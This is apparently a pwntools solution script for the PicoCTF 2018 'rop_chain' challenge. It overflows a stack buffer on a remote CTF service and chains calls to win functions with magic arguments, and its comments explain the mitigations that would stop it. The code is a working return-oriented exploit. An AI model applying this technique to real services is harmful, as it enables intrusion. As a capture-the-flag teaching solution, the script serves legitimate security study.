exp
from pwn import *
# Solution script for the PicoCTF 2018 "rop_chain" challenge: it connects to
# the hosted CTF service, overflows a stack buffer and chains three function
# calls through overwritten return addresses. The vulnerable read itself is
# not shown on this page.
#
# Defensive takeaway: every address below is read from the local ELF's symbol
# table and the return address is reached with plain padding, so the chain
# presumably depends on the target having no PIE and no stack canary (confirm
# with checksec). Either mitigation, or a bounded read, would break it.
context.log_level = 'debug'  # debug logging echoes all traffic sent/received

proc_name = './PicoCTF_2018_rop_chain'
p = remote('node3.buuoj.cn', 27027)
elf = ELF(proc_name)  # parsed locally, only to resolve symbol addresses

flag_addr = elf.sym['flag']
win_function1 = elf.sym['win_function1']
win_function2 = elf.sym['win_function2']
main_addr = elf.sym['main']  # resolved but never used by the payload below

# 0x18 + 4 filler bytes: presumably the distance from the buffer to the saved
# frame pointer plus the 4-byte saved EBP, so the next word is the return address.
padding = b'a' * (0x18 + 4)

# 32-bit little-endian words that follow the padding, in stack order.
# Slot meanings assume the usual x86 cdecl layout (return address, then args).
chain = [
    win_function1,  # overwrites the saved return address
    win_function2,  # return address seen by win_function1
    flag_addr,      # return address seen by win_function2
    0xBAAAAAAD,     # first-argument slot of win_function2 (presumably a checked magic value)
    0xDEADBAAD,     # first-argument slot of flag (presumably a checked magic value)
]
payload = padding + b''.join(p32(word) for word in chain)

# NOTE(review): the delimiter is a str while the payload is bytes; pwntools
# accepts this on Python 3 but warns. b'input>' would be the consistent form.
p.sendlineafter('input>', payload)

# Two reads drain the service's replies. The return values are discarded, so
# the output is only visible through the debug log enabled above.
p.recv()
p.recv()